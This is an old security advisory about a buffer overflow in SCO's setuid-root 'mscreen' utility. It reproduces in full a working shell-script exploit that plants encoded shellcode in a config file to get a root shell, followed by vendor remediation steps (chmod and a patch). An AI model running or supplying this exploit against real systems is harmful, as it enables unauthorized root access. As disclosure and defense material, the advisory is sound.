COMMAND

    mscreen

SYSTEMS AFFECTED

    SCO Open Desktop/Open Server 3.0 (all, also SCO UNIX 3.2v4)
    SCO OpenServer 5.0 (all, also SCO Internet FastStart)
    SCO CMW+ 3.0

PROBLEM

    'bst'  found  following.   The  SCO's  suid root "mscreen" (serial
    multiscreens utility) has a  buffer overflow when $TERM  is copied
    into a fixed buffer.  It's confirmed with 5.0.4 at least.   Leshka
    made an exploit.

    #!/bin/sh
    #
    #                                   Hi !
    #             This is a buffer overflow exploit for mscreen bug
    #                (SCO OpenServer Enterprise System v 5.0.4p).
    #              This script runs a shell with root permissions.
    #            If you have any problems with it, drop me a letter.
    #                                Have fun !
    #
    #
    #                           ----------------------
    #               ---------------------------------------------
    #    -----------------   Dedicated to my beautiful lady   ------------------
    #               ---------------------------------------------
    #                           ----------------------
    #
    #          Leshka Zakharoff, 1998. E-mail: leshka@leshka.chuvashia.su
    #
    #
    #
    echo '***4.999,99***('\
    '\0220\0353*]U\0376M\0347\0376M\0353\0376M\0354\0376M\0355\0377E\0357\0376M'\
    '\0364\0303/bin/sh\01\0215\05;\01\01\01\0232\0377\0377\0377\0377\07\01\0307'\
    '\0304"\0365\04\010\0350\0313\0377\0377\0377\0201\0305\0357\0377\0377\0377U'\
    'U\0201\0305\0361\0377\0377\0377U\0350\0324\0377\0377\0377)'>$HOME/.mscreenrc
    echo 'leshka:*leshka**leshka**leshka*#\0365\04\010:'>$HOME/mscreencap
    MSCREENCAP=$HOME/mscreencap TERM=leshka; export MSCREENCAP TERM
    echo "Type any command than press <ENTER> and <CTRL>-D"
    cat|/usr/bin/mscreen;rm $HOME/.mscreenrc $HOME/mscreencap

SOLUTION

    For SCO CMW+,  the mscreen utility  is non-functional; however,  a
    binary is installed on the system with the set-user-id  attribute.
    This should be disabled by executing the following command  logged
    in as root:

        # chmod 0 /usr/bin/mscreen

    For SCO OpenServer  5 and SCO  Open Desktop/Open Server  3, SCO is
    providing an interim patch to address this issue in the form of  a
    System Security  Enhancement (SSE)  package.   SSE016 contains new
    versions  of  the  mscreen  binary  for  each  system type.  It is
    available for Internet  download via anonymous  ftp, and from  the
    SCOFORUM  on  Compuserve.   You  can  download  the SSE package as
    follows:

        ftp://ftp.sco.COM/SSE/sse016.ltr    (cover letter, ASCII text)
        ftp://ftp.sco.COM/SSE/sse016.tar.Z  (new binaries, compressed tar file)

      Compuserve:
        GO SCOFORUM, and search  Library 11 (SLS/SSE Files)  for these
        filenames:
        SSE016.LTR      (cover letter, ASCII text)
        SSE016.TAZ      (new binaries, compressed tar file)